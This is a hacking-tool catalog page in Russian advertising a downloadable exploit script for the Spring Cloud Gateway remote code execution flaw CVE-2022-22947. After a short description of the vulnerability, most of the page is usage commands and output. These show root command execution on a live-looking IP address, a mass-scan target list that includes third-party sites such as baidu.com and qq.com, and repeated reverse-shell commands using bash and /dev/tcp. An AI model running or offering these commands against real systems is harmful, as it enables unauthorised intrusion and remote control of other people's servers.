Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-22947_EXP — 一个可单独、批量验证的脚本,也可以反弹shell | Kitploit
Инструменты/GitHubGitHub/anansec/cve-2022-22947_exp
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubanansec/cve-2022-22947_exp

CVE-2022-22947_EXP

一个可单独、批量验证的脚本,也可以反弹shell

Репозиторий
714 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

1. Удаленное выполнение кода в Spring Cloud Gateway

Уровень опасности: Высокий

Статус POC/EXP: Опубликован

Номер CNVD: CNNVD-2022-16402

​ Номер CVE: CVE-2022-22947

2. Затрагиваемые версии:

    • VMWare Spring Cloud Gateway 3.1.0
    • VMWare Spring Cloud Gateway >=3.0.0, <=3.0.6
    • VMWare Spring Cloud Gateway <3.0.0

3. Описание уязвимости

В Spring Cloud Gateway существует уязвимость удаленного выполнения кода. Эта уязвимость возникает в конечной точке Actuator приложения Spring Cloud Gateway, если она включена, открыта и не защищена, что делает систему подверженной инъекции кода. Злоумышленник может использовать эту уязвимость для создания вредоносного запроса, позволяющего выполнить произвольную команду на удаленном хосте.

4. Использование EXP для CVE-2022-22947

(1) Особенности скрипта

  1. Поддерживает проверку одной цели
  2. Поддерживает массовую проверку уязвимостей
  3. Поддерживает обратную оболочку (reverse shell)

(2) Параметры скрипта

root@kitploit:~
-h    Показать справку
-u    Указать URL цели
-c    Указать команду для выполнения (по умолчанию id)
-f    Указать файл с URL-адресами целей

(3) Использование скрипта

1. Проверка одной цели

Способ 1:

root@kitploit:~
E:\pocs>python cve-2022-22947.py

    Проверка одной цели:
            1. python cve-2022-22947.py   Войдите в интерактивный режим, затем введите URL цели и команду для выполнения в соответствии с подсказками. Убедитесь в правильности команды.
            2. python cve-2022-22947.py  -u http://example.com -c whoami
        Проверка нескольких целей:
            1. python cve-2022-22947.py -f url.txt , поместите все подлежащие проверке цели в директорию url
        Обратная оболочка:
            1. python cve-2022-22947.py  -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
            2. Войдите в интерактивный режим, введите цель и команду для обратной оболочки

Введите URL цели: http://123.58.236.76:8484
Введите команду для выполнения (по умолчанию id): whoami
[+]Цель: http://123.58.236.76:8484 , успешно получен вывод команды: ['root\\n']

Способ 2:

root@kitploit:~
E:\learn\python\pocs\pocs>python cve-2022-22947.py -u http://123.58.236.76:8484 -c whoami

    Проверка одной цели:
            1. python cve-2022-22947.py   Войдите в интерактивный режим, затем введите URL цели и команду для выполнения в соответствии с подсказками. Убедитесь в правильности команды.
            2. python cve-2022-22947.py  -u http://example.com -c whoami
        Проверка нескольких целей:
            1. python cve-2022-22947.py -f url.txt , поместите все подлежащие проверке цели в директорию url
        Обратная оболочка:
            1. python cve-2022-22947.py  -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
            2. Войдите в интерактивный режим, введите цель и команду для обратной оболочки

[+]Цель: http://123.58.236.76:8484 , успешно получен вывод команды: ['root\\n']

2. Массовая проверка

root@kitploit:~
E:\learn\python\pocs\pocs>python cve-2022-22947.py -f url.txt

    Проверка одной цели:
            1. python cve-2022-22947.py   Войдите в интерактивный режим, затем введите URL цели и команду для выполнения в соответствии с подсказками. Убедитесь в правильности команды.
            2. python cve-2022-22947.py  -u http://example.com -c whoami
        Проверка нескольких целей:
            1. python cve-2022-22947.py -f url.txt , поместите все подлежащие проверке цели в директорию url
        Обратная оболочка:
            1. python cve-2022-22947.py  -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
            2. Войдите в интерактивный режим, введите цель и команду для обратной оболочки

[+]Цель: http://123.58.236.76:8484 , успешно получен вывод команды: ['uid=0(root']
[+]Цель: http://123.58.236.76:8484 , успешно получен вывод команды: ['uid=0(root']
[+]Цель: http://123.58.236.76:8484 , успешно получен вывод команды: ['uid=0(root']
[-]Цель: http://www.baidu.com, проверка уязвимости не удалась, проверьте вручную!
[-]Цель: http://www.qq.com, проверка уязвимости не удалась, проверьте вручную!
[+]Цель: http://123.58.236.76:8484 , успешно получен вывод команды: ['uid=0(root']

3. Обратная оболочка

root@kitploit:~
python cve-2022-22947.py -u http://123.58.236.76:8484 -c "bash -i >& /dev/tcp/xxx.xxx.xxx/65534 0>&1"

image-20220519233354807

image-20220519233429912

Скачать инструмент